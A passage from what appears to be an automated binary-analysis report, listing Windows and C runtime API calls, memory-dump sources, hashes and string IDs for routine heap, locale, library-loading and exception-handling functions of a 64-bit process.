                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7E3D7AC55,?,?,8000000000000000,00007FF7E3D76A2D,?,?,?,?,00007FF7E3D7AE29), ref: 00007FF7E3D7ADE1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction ID: 97d12d3ccc7364914c0f88e354693b3c7a5f9ca9df200da95f9fadfb0b34b41d
                                                                                                                                                                      • Opcode Fuzzy Hash: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction Fuzzy Hash: BCF04F14B4920281FFD5F7E199513F5DA945F88782F8C5037E80EA6782FE3CA8858232
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3527080286-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7AA7C: GetLastError.KERNEL32(?,?,?,00007FF7E3D6FD01,?,?,7FFFFFFFFFFFFFFF,00007FF7E3D61C2A), ref: 00007FF7E3D7AA8B
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7AA7C: SetLastError.KERNEL32(?,?,?,00007FF7E3D6FD01,?,?,7FFFFFFFFFFFFFFF,00007FF7E3D61C2A), ref: 00007FF7E3D7AB29
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF7E3D81AFD
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF7E3D81B38
                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF7E3D7386C), ref: 00007FF7E3D81B7D
                                                                                                                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF7E3D7386C), ref: 00007FF7E3D81BA5
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                      • API String ID: 2136749100-905460609
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3939093798-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1443284424-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: %
                                                                                                                                                                      • API String ID: 3668304517-2567322570
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocaletry_get_function
                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F2B7
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F2D6
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: GetProcAddress.KERNEL32(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EB80
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F2F5
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: LoadLibraryW.KERNELBASE(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EACB
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: GetLastError.KERNEL32(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EAD9
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: LoadLibraryExW.KERNEL32(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EB1B
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F314
                                                                                                                                                                        • Part of subcall function 00007FF7E3D7EA28: FreeLibrary.KERNEL32(?,?,00000005,00007FF7E3D7EF06,?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D), ref: 00007FF7E3D7EB54
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F333
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F352
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F371
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F390
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F3AF
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F3CE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name$false$true
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F94F
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F95D
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F987
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F9CD
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F9D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
• Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
• Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
• Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
• Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2829165498-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
• Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
• Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
• Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
• Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
• Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
• Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3523768491-393685449
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
• Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
• Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
• Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
• Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E3D834F6
                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7E3D83473,?,?,FFFFFFFE,00007FF7E3D83EB2), ref: 00007FF7E3D835B4
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7E3D83473,?,?,FFFFFFFE,00007FF7E3D83EB2), ref: 00007FF7E3D8363E
                                                                                                                                                                      Memory Dump Source
• Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
• Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2210144848-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1087005451-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_errorf
                                                                                                                                                                      • String ID: "$powf
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: ios_base::failbit set
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_error
                                                                                                                                                                      • String ID: "$pow
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_errno_from_matherr
                                                                                                                                                                      • String ID: exp
                                                                                                                                                                      Uniqueness

